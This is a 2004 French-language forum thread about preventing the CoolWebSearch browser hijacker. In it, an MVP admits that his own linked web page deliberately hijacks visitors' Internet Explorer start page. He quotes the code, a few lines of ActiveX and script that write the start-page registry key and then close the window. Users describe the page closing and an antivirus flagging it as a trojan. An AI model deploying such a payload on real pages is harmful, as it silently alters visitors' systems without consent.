Prévention CoolWebSearch

Le
JacK
Salut,

Un des BHO les plus vicieux à éradiquer.

Prévenir vaut mieux que guérir.
http://msmvps.com/xpditif/archive/2004/08/03/11181.aspx
--
http://www.optimix.be.tf /MVP WindowsXP/ http://websecurite.org
http://www.msmvps.com/XPditif/
http://experts.microsoft.fr/longhorn4u/
*Helping you void your warranty since 2000*
***ANTISPAM***
Click on the link to answer -Cliquez sur le lien pour répondre
http://www.cerbermail.com/?csaLJS6yvZ
@(*0*)@ JacK

  • Partager ce contenu :
Vos réponses Page 1 / 2
Trier par : date / pertinence
Artic-C
Le #199047
Bonjour * JacK* qui nous dit :

Salut,

Un des BHO les plus vicieux à éradiquer.

Prévenir vaut mieux que guérir.
http://msmvps.com/xpditif/archive/2004/08/03/11181.aspx


il y a un problème lorsque je clique sur le lien dans ton blog ou que même
si je le re-copie dans la barre d'adresse IE, mon IE6 se referme, chose qui
ne m'arrive que sur le lien qui mène à
http://babin.nelly.free.fr/spyware_1.htm

JacK [MVP]
Le #199045
sur les news:%
¥©¥ [MVP]
Bonjour * JacK* qui nous dit :

Salut,

Un des BHO les plus vicieux à éradiquer.

Prévenir vaut mieux que guérir.
http://msmvps.com/xpditif/archive/2004/08/03/11181.aspx


il y a un problème lorsque je clique sur le lien dans ton blog ou que
même si je le re-copie dans la barre d'adresse IE, mon IE6 se
referme, chose qui ne m'arrive que sur le lien qui mène à
http://babin.nelly.free.fr/spyware_1.htm


Hello,

Ce n'est pas un problème mais un petit coup de vice si IE n'est pas
configuré convenablement :-D

Si pas à jour, Optimix s'installe en page de démarrage.

Si à jour, l'exploit ne peut s'effectuer et la page se ferme sans
avertissement.
Si bon réglage d'IE et à jour, il y a une alerte signalant quela page en
cours cherche à fermer lafenêtre et te demande si tu veux accepter ou non.

Je vous laisse chercher les bons réglages pour avoir accès avec IE :-D
--
http://www.optimix.be.tf /MVP WindowsXP/ http://websecurite.org
http://www.msmvps.com/XPditif/
http://experts.microsoft.fr/longhorn4u/
*Helping you void your warranty since 2000*
---***ANTISPAM***---
Click on the link to answer -Cliquez sur le lien pour répondre
http://www.cerbermail.com/?csaLJS6yvZ
@(*0*)@ JacK


Fabrice [MVP]
Le #199044
Salut,

Et l'affichage de ce site :
http://babin.nelly.free.fr/spyware_1.htm
Avec Kaspersky 5 provoque l'apparition d'une fenêtre qui bloque l'accès au
site.
Tentative d'installation :
Torjan.JS.Seeker-based


Fabrice
Microsoft MVP
http://www.fab3d.fr.st
Faq Windows XP :
http://a.vouillon.online.fr/faq-winxp.htm

"Le savoir vaut mieux qu'une illusion, accepter sans comprendre, c'est la
raison."


" ¥©¥ [MVP]" news: %
Bonjour * JacK* qui nous dit :

Salut,

Un des BHO les plus vicieux à éradiquer.

Prévenir vaut mieux que guérir.
http://msmvps.com/xpditif/archive/2004/08/03/11181.aspx


il y a un problème lorsque je clique sur le lien dans ton blog ou que même
si je le re-copie dans la barre d'adresse IE, mon IE6 se referme, chose
qui
ne m'arrive que sur le lien qui mène à
http://babin.nelly.free.fr/spyware_1.htm





P
Le #199043
Hello JacK [MVP] !
Si à jour, l'exploit ne peut s'effectuer et la page se ferme sans
avertissement.
Si bon réglage d'IE et à jour, il y a une alerte signalant quela page en
cours cherche à fermer lafenêtre et te demande si tu veux accepter ou non.

Je vous laisse chercher les bons réglages pour avoir accès avec IE :-D


mdr mdr mdr
En plus c'est formateur!
Ah ce Jack!

--
Bien cordialement,
Aide toi le ciel t'aidera : http://bailly.chez.tiscali.fr/Forums.htm
Pour m'écrire ou prendre contact "En ligne" :
http://minilien.com/?1xjHkMIEp0
Quelques pages XP : http://bailly.chez.tiscali.fr/XP/XP.htm

Milo
Le #199041
JacK wrote:
:: Salut,
::
:: Un des BHO les plus vicieux à éradiquer.
::
:: Prévenir vaut mieux que guérir.
:: http://msmvps.com/xpditif/archive/2004/08/03/11181.aspx

Bonsoir JacK
je suppose que ce que tu propose est aussi valable pour Windows Me, par
contre lorsque j'arrive sur la page du lien ci dessus, en cliquant "cette
page" il ne sepasse rien, est ce les règle de message OE, outclok, autres ,
je ne sais pas.
merci de me dire ce que je peux faire pour télécharger ton patch.

--
A+
Milo
JacK [MVP]
Le #199019
sur les news:%23wHR5%
Milo
JacK wrote:
Salut,

Un des BHO les plus vicieux à éradiquer.

Prévenir vaut mieux que guérir.
http://msmvps.com/xpditif/archive/2004/08/03/11181.aspx



Bonsoir JacK
je suppose que ce que tu propose est aussi valable pour Windows Me,
par contre lorsque j'arrive sur la page du lien ci dessus, en
cliquant "cette page" il ne sepasse rien, est ce les règle de message
OE, outclok, autres , je ne sais pas.
merci de me dire ce que je peux faire pour télécharger ton patch.


Hello,

Attendre que quelqu'un explique comment il a réglé IE pour avoir accès ;)
Ça ne pose pas de problème insurmontable.

Si pas de réponse d'ici demain, j'expliquerai le truc ;).
--



Milo
Le #199018
JacK [MVP] wrote:
:: sur les news:%
:: ¥©¥ [MVP] ::: Bonjour * JacK* qui nous dit :
:::
:::: Salut,
::::
:::: Un des BHO les plus vicieux à éradiquer.
::::
:::: Prévenir vaut mieux que guérir.
:::: http://msmvps.com/xpditif/archive/2004/08/03/11181.aspx
:::
::: il y a un problème lorsque je clique sur le lien dans ton blog ou
::: que même si je le re-copie dans la barre d'adresse IE, mon IE6 se
::: referme, chose qui ne m'arrive que sur le lien qui mène à
::: http://babin.nelly.free.fr/spyware_1.htm
::
:: Hello,
::
:: Ce n'est pas un problème mais un petit coup de vice si IE n'est pas
:: configuré convenablement :-D
::
:: Si pas à jour, Optimix s'installe en page de démarrage.
::
:: Si à jour, l'exploit ne peut s'effectuer et la page se ferme sans
:: avertissement.
:: Si bon réglage d'IE et à jour, il y a une alerte signalant quela
:: page en cours cherche à fermer lafenêtre et te demande si tu veux
:: accepter ou non.
::
:: Je vous laisse chercher les bons réglages pour avoir accès avec IE

RE,
Bon, je vais attendre d'autres explications, car pour moi c'est du chinois
pour le moment.
Mon ie6 est à jour, le reglage??? that is the question. Comme je pars et je
reviens le 16, d'ici là, j'aurai peut être la soluce.
Bonne soirée

--
A+
Milo
JacK [MVP]
Le #199017
sur les news:
Fabrice [MVP]
Salut,

Et l'affichage de ce site :
http://babin.nelly.free.fr/spyware_1.htm
Avec Kaspersky 5 provoque l'apparition d'une fenêtre qui bloque
l'accès au site.
Tentative d'installation :
Torjan.JS.Seeker-based



Hello Fabrice,

En effet, je me suis basé sur le code d'un trojan pour faire ce petit machin
mais je te rassure, il ne s'agit pas d'un trojan mais d'un browser hijack
"maison" que Microsoft a partiellement résolu : la page ne s'ouvre pas parce
qu'IE panique :-D
Plus sérieusement, en cas de vulnérabilité, la page se ferme et àla
réouverture la home page est optimix.

J'avais signalé en son temps (plus de 6 mois sur bugtraq et à MS cette
vulnérabilité :-D)

Comme précisé, avec des paramètres IE ad hoc, il y a une boîte de dialogue
proposant une action et l'ouverture de la page sans dommage.

Il m'arrive de temps en temps d'être d'humeur folâtre lol

Pour info, voici le code inséré :

<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.RegWrite("HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page", "http://www.optimix.be.tf")
</script>
<script language=javascript>
self.close()
</script>



--
http://www.optimix.be.tf /MVP WindowsXP/ http://websecurite.org
http://www.msmvps.com/XPditif/
http://experts.microsoft.fr/longhorn4u/
*Helping you void your warranty since 2000*
---***ANTISPAM***---
Click on the link to answer -Cliquez sur le lien pour répondre
http://www.cerbermail.com/?csaLJS6yvZ
@(*0*)@ JacK

Milo
Le #199012
JacK [MVP] wrote:
:: sur les news:%23wHR5%
:: Milo ::: JacK wrote:
::::: Salut,
:::::
::::: Un des BHO les plus vicieux à éradiquer.
:::::
::::: Prévenir vaut mieux que guérir.
::::: http://msmvps.com/xpditif/archive/2004/08/03/11181.aspx
:::
::: Bonsoir JacK
::: je suppose que ce que tu propose est aussi valable pour Windows Me,
::: par contre lorsque j'arrive sur la page du lien ci dessus, en
::: cliquant "cette page" il ne sepasse rien, est ce les règle de
::: message OE, outclok, autres , je ne sais pas.
::: merci de me dire ce que je peux faire pour télécharger ton patch.
::
:: Hello,
::
:: Attendre que quelqu'un explique comment il a réglé IE pour avoir
:: accès ;) Ça ne pose pas de problème insurmontable.
::
:: Si pas de réponse d'ici demain, j'expliquerai le truc ;).

Re, JacK
Comme d'hab t'es sympa et surtout competent. je veux bien pour demain mais
je ne reviens que le 15 ou le 16, j'y serai à mon retour
merci
Bonne soirée à toi

--
A+
Milo
Claude LaFrenière [climenole]
Le #199010
Le 3 août 2004

Bonjour Milo :-D

Dans le Msg ID

JacK [MVP] wrote:

:::: Prévenir vaut mieux que guérir.

RE,
Bon, je vais attendre d'autres explications, car pour moi c'est du chinois
pour le moment.
Mon ie6 est à jour, le reglage??? that is the question.


Simple : utilise un autre navigateur (Opera ou Mozilla).
Pas d'activeX pas de problèmes...

Bonne vacances :-)

--
[Tenez le forum au courant / suivi sur le même fil de discussion s.v.p.]
{ Msg ID Cf.: http://www.google.fr/grphp?hl=fr&tab=wg&q= }

Claude LaFrenière 2004-08-03 14:07:31 HAE GMT -05:00
Courriel http://cerbermail.com/?FslokTsjQ7
PGP ID http://pgpkeys.mit.edu:11371 0xC3C0E2C2

Poster une réponse
Anonyme